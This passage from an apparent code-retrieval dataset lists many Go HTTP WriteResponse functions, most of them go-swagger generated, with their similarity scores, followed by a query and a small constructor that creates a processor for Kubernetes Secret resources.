http.ResponseWriter, producer httpkit.Producer) {\n\n\trw.WriteHeader(200)\n}", "func WriteResponse(w http.ResponseWriter, v interface{}, statusCode int) {\n\tresBody, err := json.Marshal(v)\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tw.Header().Add(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(statusCode)\n\t_, _ = w.Write(resBody)\n}", "func WriteResponse(w http.ResponseWriter, code int, object interface{}) {\n\tdata, err := json.Marshal(object)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(code)\n\tw.Write(data)\n}", "func (o *GetPingOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n}", "func writeResponse(body []byte, w *http.ResponseWriter) {\n\t(*w).Header().Set(\"Content-Type\", \"text/plain; charset=utf-8\")\n\t_, err := (*w).Write(body)\n\tif err != nil {\n\t\tlog.Println(err.Error())\n\t\t(*w).WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n}", "func WriteResponse(w http.ResponseWriter, code int, resp interface{}) error {\n\tj, err := json.Marshal(resp)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn err\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(code)\n\n\t_, err = w.Write(j)\n\treturn err\n}", "func writeResponse(w *http.ResponseWriter, res responseData, status int) {\n\tresJSON, err := json.Marshal(res)\n\tif err != nil {\n\t\thttp.Error(*w, \"Failed to parse struct `responseData` into JSON object\", http.StatusInternalServerError)\n\t}\n\n\t(*w).Header().Set(\"Content-Type\", \"application/json\")\n\t(*w).WriteHeader(status)\n\t(*w).Write(resJSON)\n}", "func WriteResponse(w http.ResponseWriter, d string) {\n\tw.WriteHeader(200)\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\tw.Write([]byte(d))\n\treturn\n}", "func (o *CreateFacilityUsersOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func writeResponse(w http.ResponseWriter, response Response) {\n\tjson, err := json.Marshal(&response)\n\n\tif err != nil {\n\t\tfmt.Fprint(w, \"There was an error processing the request.\")\n\t}\n\n\tcommon.Log(fmt.Sprintf(\"Returning response %s\", json))\n\tfmt.Fprintf(w, \"%s\", json)\n}", "func (o *CreateProgramOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *DepositNewFileOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *UpdateMedicineOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *CreateTaskCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header Location\n\n\tlocation := o.Location.String()\n\tif location != \"\" {\n\t\trw.Header().Set(\"Location\", location)\n\t}\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func writeResponse(r *http.Request, w http.ResponseWriter, code int, resp interface{}) {\n\n\t// Deal with CORS\n\tif origin := r.Header.Get(\"Origin\"); origin != \"\" {\n\t\tw.Header().Set(\"Access-Control-Allow-Origin\", origin)\n\t\tw.Header().Set(\"Access-Control-Allow-Methods\", \"DELETE, GET, HEAD, OPTIONS, POST, PUT\")\n\t\tw.Header().Set(\"Access-Control-Allow-Credentials\", \"true\")\n\t\t// Allow any headers\n\t\tif wantedHeaders := r.Header.Get(\"Access-Control-Request-Headers\"); wantedHeaders != \"\" {\n\t\t\tw.Header().Set(\"Access-Control-Allow-Headers\", wantedHeaders)\n\t\t}\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"text/plain; charset=utf-8\")\n\n\tb, err := json.Marshal(resp)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\tfmt.Fprintln(w, `{\"error\":\"failed to marshal json\"}`)\n\t\treturn\n\t}\n\n\tw.WriteHeader(code)\n\tfmt.Fprintln(w, string(b))\n}", "func (o *VerifyAccountCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func writeResponse(w http.ResponseWriter, h int, p interface{}) {\n\t// I set the content type...\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\t// ... I write the specified status code...\n\tw.WriteHeader(h)\n\t// ... and I write the response\n\tb, _ := json.Marshal(p)\n\tw.Write(b)\n}", "func (o *UpdateCatalogOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n}", "func (c *SwitchVersion) WriteResponse(rw http.ResponseWriter, rp runtime.Producer) {\n\tswitch c.Request.Method {\n\tcase http.MethodPost:\n\t\tc.postSwitchVersion(rw, rp)\n\tdefault:\n\t\tc.notSupported(rw, rp)\n\t}\n}", "func (o *PutRecordingsOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *BofaChkUpdateOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *VerifyHealthCredentialOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func WriteResponse(w http.ResponseWriter, code int, err error, data interface{}, t0 time.Time) {\n\tw.WriteHeader(code)\n\tresp := &Response{Data: data, Dur: fmt.Sprint(time.Since(t0)), OK: false}\n\tif code < 300 {\n\t\tresp.OK = true\n\t}\n\tif err != nil {\n\t\tresp.Err = err.Error()\n\t}\n\terr = json.NewEncoder(w).Encode(resp)\n\tif err != nil {\n\t\tlog.Infof(\"failed to json encode response: %v\", err)\n\t\tif _, err = w.Write([]byte(spew.Sdump(resp))); err != nil {\n\t\t\tlog.Infof(\"failed to write dump of response: %v\", err)\n\t\t}\n\t}\n}", "func (o *NewDiscoveryOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n}", "func writeResponse(data []byte, size int64, ctype string, w http.ResponseWriter) {\n\tw.Header().Set(\"Content-Type\", ctype)\n\tw.Header().Set(\"Content-Length\", fmt.Sprintf(\"%d\", size))\n\tw.Header().Set(\"Cache-Control\", \"no-transform,public,max-age=86400,s-maxage=2592000\")\n\tw.WriteHeader(http.StatusOK)\n\tw.Write(data)\n}", "func writeResponse(w http.ResponseWriter, code int, object interface{}) {\n\tfmt.Println(\"writing response:\", code, object)\n\tdata, err := json.Marshal(object)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tw.Header().Set(\"content-type\", \"application/json\")\n\tw.WriteHeader(code)\n\tw.Write(data)\n}", "func writeResponse(w http.ResponseWriter, authZRes *authorization.Response) {\n\n\tdata, err := json.Marshal(authZRes)\n\tif err != nil {\n\t\tlog.Fatal(\"Failed to marshel authz response %q\", err.Error())\n\t} else {\n\t\tw.Write(data)\n\t}\n\n\tif authZRes == nil || authZRes.Err != \"\" {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t}\n}", "func (o *GetCharactersCharacterIDOpportunitiesOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header Cache-Control\n\n\tcacheControl := o.CacheControl\n\tif cacheControl != \"\" {\n\t\trw.Header().Set(\"Cache-Control\", cacheControl)\n\t}\n\n\t// response header Expires\n\n\texpires := o.Expires\n\tif expires != \"\" {\n\t\trw.Header().Set(\"Expires\", expires)\n\t}\n\n\t// response header Last-Modified\n\n\tlastModified := o.LastModified\n\tif lastModified != \"\" {\n\t\trw.Header().Set(\"Last-Modified\", lastModified)\n\t}\n\n\trw.WriteHeader(200)\n\tpayload := o.Payload\n\tif payload == nil {\n\t\tpayload = make(models.GetCharactersCharacterIDOpportunitiesOKBody, 0, 50)\n\t}\n\n\tif err := producer.Produce(rw, payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n\n}", "func (o *WeaviateThingsGetNotImplemented) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(501)\n}", "func (c *UpdateSwitch) WriteResponse(rw http.ResponseWriter, rp runtime.Producer) {\n\tswitch c.Request.Method {\n\tcase http.MethodPost:\n\t\tc.postUpdateSwitch(rw, rp)\n\tdefault:\n\t\tc.notSupported(rw, rp)\n\t}\n}", "func (c *UpdateSwitch) WriteResponse(rw http.ResponseWriter, rp runtime.Producer) {\n\tswitch c.Request.Method {\n\tcase http.MethodPost:\n\t\tc.postUpdateSwitch(rw, rp)\n\tdefault:\n\t\tc.notSupported(rw, rp)\n\t}\n}", "func (o *UpdateLinkInPostOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *GetChatroomsIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetEchoNameOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *GetUIContentOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *ListVsphereResourceOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func ResponseWrite(w http.ResponseWriter, responseCode int, responseData interface{}) {\n\t// Write Response\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(responseCode)\n\n\t// Write JSON to Response\n\tjson.NewEncoder(w).Encode(responseData)\n}", "func writeHTTPResponseInWriter(httpRes http.ResponseWriter, httpReq *http.Request, nobelPrizeWinnersResponse []byte, err error) {\n\tif err != nil {\n\t\tlog.Println(err.Error())\n\t\thttp.Error(httpRes, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tlog.Printf(\"Request %s Succesfully Completed\", httpReq.RequestURI)\n\thttpRes.Header().Set(\"Content-Type\", \"application/json\")\n\thttpRes.Write(nobelPrizeWinnersResponse)\n}", "func (o *PostKeysKeyOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n}", "func (o *Operation) writeResponse(rw io.Writer, v interface{}) {\n\terr := json.NewEncoder(rw).Encode(v)\n\tif err != nil {\n\t\tlog.Errorf(\"Unable to send error response, %s\", err)\n\t}\n}", "func writeResponse(data interface{}, w http.ResponseWriter) error {\n\tvar (\n\t\tenc []byte\n\t\terr error\n\t)\n\tenc, err = json.Marshal(data)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn fmt.Errorf(\"Failure to marshal, err = %s\", err)\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tn, err := w.Write(enc)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn fmt.Errorf(\"Failure to write, err = %s\", err)\n\t}\n\tif n != len(enc) {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn fmt.Errorf(\"Short write sent = %d, wrote = %d\", len(enc), n)\n\t}\n\treturn nil\n}", "func (o *CreateUserOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *UpdateMoveTaskOrderPostCounselingInformationOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func WriteResponse(rw io.Writer, v interface{}) {\n\terr := json.NewEncoder(rw).Encode(v)\n\tif err != nil {\n\t\tlogger.Errorf(\"Unable to send error response, %s\", err)\n\t}\n}", "func (o *PutQuestionOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (r *response) Write(b []byte) (n int, err error) {\n\tif !r.headersSend {\n\t\tif r.status == 0 {\n\t\t\tr.status = http.StatusOK\n\t\t}\n\t\tr.WriteHeader(r.status)\n\t}\n\tn, err = r.ResponseWriter.Write(b)\n\tr.size += int64(n)\n\treturn\n}", "func (o *PostOperationsDeleteP2PPathCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *HealthGetOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *WeaviateThingsPatchNotImplemented) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(501)\n}", "func (o *VerifyEmailTokenOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *DeleteServiceIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *WeaviateThingsGetOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *Operation) writeResponse(rw io.Writer, v interface{}) {\n\terr := json.NewEncoder(rw).Encode(v)\n\t// as of now, just log errors for writing response\n\tif err != nil {\n\t\tlogger.Errorf(\"Unable to send error response, %s\", err)\n\t}\n}", "func (o *PostOperationsGetNodeEdgePointDetailsCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *UserEditOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *WeaviatePeersAnnounceOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n}", "func (o *CertifyOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func writeResponse(writer http.ResponseWriter, response *http.Response) (int64, error) {\n\tdefer response.Body.Close()\n\twriteResponseHeaders(writer, response, false)\n\treturn io.Copy(writer, response.Body)\n}", "func (o *PutMeetupDefault) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(o._statusCode)\n}", "func (o *FingerPathsPostCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *PostPlaybookOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *UpdateHostIgnitionCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *GetCharactersCharacterIDLocationOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header Cache-Control\n\n\tcacheControl := o.CacheControl\n\tif cacheControl != \"\" {\n\t\trw.Header().Set(\"Cache-Control\", cacheControl)\n\t}\n\n\t// response header Expires\n\n\texpires := o.Expires\n\tif expires != \"\" {\n\t\trw.Header().Set(\"Expires\", expires)\n\t}\n\n\t// response header Last-Modified\n\n\tlastModified := o.LastModified\n\tif lastModified != \"\" {\n\t\trw.Header().Set(\"Last-Modified\", lastModified)\n\t}\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetPingDefault) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(o._statusCode)\n}", "func (o *PostManagementKubernetesIoV1NodesOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *PutPerformancesOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *StopAppAccepted) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(202)\n}", "func (o *GetFleetsFleetIDMembersOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header Cache-Control\n\n\tcacheControl := o.CacheControl\n\tif cacheControl != \"\" {\n\t\trw.Header().Set(\"Cache-Control\", cacheControl)\n\t}\n\n\t// response header Content-Language\n\n\tcontentLanguage := o.ContentLanguage\n\tif contentLanguage != \"\" {\n\t\trw.Header().Set(\"Content-Language\", contentLanguage)\n\t}\n\n\t// response header Expires\n\n\texpires := o.Expires\n\tif expires != \"\" {\n\t\trw.Header().Set(\"Expires\", expires)\n\t}\n\n\t// response header Last-Modified\n\n\tlastModified := o.LastModified\n\tif lastModified != \"\" {\n\t\trw.Header().Set(\"Last-Modified\", lastModified)\n\t}\n\n\trw.WriteHeader(200)\n\tpayload := o.Payload\n\tif payload == nil {\n\t\tpayload = make(models.GetFleetsFleetIDMembersOKBody, 0, 50)\n\t}\n\n\tif err := producer.Produce(rw, payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n\n}", "func (o *GetMeetupsDefault) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(o._statusCode)\n}", "func (o *PostEventCreated) WriteResponse(rw http.ResponseWriter, producer httpkit.Producer) {\n\n\trw.WriteHeader(201)\n}", "func (o *GetTaskTaskIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *CreateTCPCheckAccepted) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header Reload-ID\n\n\treloadID := o.ReloadID\n\tif reloadID != \"\" {\n\t\trw.Header().Set(\"Reload-ID\", reloadID)\n\t}\n\n\trw.WriteHeader(202)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *PostOperationsGetNetworkElementListCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *ServiceInstanceLastOperationGetOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header RetryAfter\n\n\tretryAfter := o.RetryAfter\n\tif retryAfter != \"\" {\n\t\trw.Header().Set(\"RetryAfter\", retryAfter)\n\t}\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetPiecesIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetTaskDetailsOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *UpdateClusterOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *GetDetailOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\trw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetServicesHaproxyRuntimeAclsIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (r *responseInfoRecorder) Write(b []byte) (int, error) {\n\tr.ContentLength += int64(len(b))\n\tif r.statusCode == 0 {\n\t\tr.statusCode = http.StatusOK\n\t}\n\treturn r.ResponseWriter.Write(b)\n}", "func (o *LogoutOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *UploadFileOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func WriteResponse(w http.ResponseWriter, data interface{}) error {\n\tenv := map[string]interface{}{\n\t\t\"meta\": map[string]interface{}{\n\t\t\t\"code\": http.StatusOK,\n\t\t},\n\t\t\"data\": data,\n\t}\n\treturn jsonResponse(w, env)\n}", "func (o *WeaviateThingTemplatesCreateNotImplemented) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(501)\n}", "func (r *Responder) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\tfor k, v := range r.headers {\n\t\tfor _, val := range v {\n\t\t\trw.Header().Add(k, val)\n\t\t}\n\t}\n\n\trw.WriteHeader(r.code)\n\n\tif r.response != nil {\n\t\tif err := producer.Produce(rw, r.response); err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t}\n}", "func (o *GetGateSourceByGateNameAndMntOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *CreateSpoeCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(201)\n\tpayload := o.Payload\n\tif err := producer.Produce(rw, payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n}", "func (o *Output) writeResponse(response string) error {\r\n\t// write the response\r\n\tif _, err := o.writer.WriteString(response + \"\\n\"); err != nil {\r\n\t\treturn err\r\n\t}\r\n\r\n\treturn nil\r\n}", "func (o *GetTransportByIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *TransferOK) WriteResponse(rw http.ResponseWriter, producer httpkit.Producer) {\n\n\trw.WriteHeader(200)\n\tif err := producer.Produce(rw, o.Payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n\n}", "func (o *CreateUserCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *ViewOneOrderOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetVisiblePruebasFromQuestionTestInternalServerError) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(500)\n}", "func (o *GetWhaleTranfersOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tpayload := o.Payload\n\tif payload == nil {\n\t\t// return empty array\n\t\tpayload = make([]*models.OperationsRow, 0, 50)\n\t}\n\n\tif err := producer.Produce(rw, payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n}", "func (o *SearchTournamentsOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tpayload := o.Payload\n\tif payload == nil {\n\t\tpayload = make([]*models.Tournament, 0, 50)\n\t}\n\n\tif err := producer.Produce(rw, payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n\n}", "func (o *CreateTCPCheckCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(201)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (s *Server) writeInfoResponse(\n\tw http.ResponseWriter,\n\tr *http.Request,\n\tmessage []byte,\n\tstatus int,\n\theaders map[string]string,\n) {\n\tfor k, v := range headers {\n\t\tw.Header().Add(k, v)\n\t}\n\n\tw.WriteHeader(status)\n\tw.Write(message)\n}" ]
[ "0.81303823", "0.7882039", "0.77722245", "0.7771901", "0.7753117", "0.7740585", "0.76670325", "0.7638451", "0.76095873", "0.75798", "0.7579178", "0.7567389", "0.7560546", "0.75579476", "0.75447774", "0.7542929", "0.75416607", "0.753386", "0.7531158", "0.75192654", "0.75191355", "0.7513389", "0.7512029", "0.75050455", "0.7503395", "0.74984574", "0.74875605", "0.74839836", "0.74772394", "0.7467842", "0.746699", "0.7465759", "0.7464175", "0.746404", "0.746404", "0.7461224", "0.7460309", "0.74595356", "0.74463046", "0.7443478", "0.7435917", "0.7426582", "0.7425581", "0.74186546", "0.7413175", "0.7407469", "0.74063516", "0.74048966", "0.7398737", "0.7389631", "0.738607", "0.73806983", "0.7360552", "0.7360491", "0.7355327", "0.7354953", "0.73532444", "0.7347445", "0.734586", "0.732798", "0.732577", "0.73178244", "0.7316643", "0.7316071", "0.7315527", "0.7312546", "0.73114824", "0.7310336", "0.7309039", "0.73007035", "0.7297214", "0.7291373", "0.7291277", "0.72884554", "0.72845477", "0.72835207", "0.7281928", "0.7281033", "0.72751075", "0.7274423", "0.7273193", "0.72730565", "0.72695094", "0.7269139", "0.72690886", "0.7265927", "0.72615093", "0.72529227", "0.7251764", "0.72490144", "0.72479355", "0.72469014", "0.72407585", "0.72390425", "0.72367245", "0.7234706", "0.722777", "0.722197", "0.7215153", "0.72140837", "0.7213089" ]
0.0
-1
New creates processor for k8s Secret resource.
func New() helmify.Processor { return &secret{} }
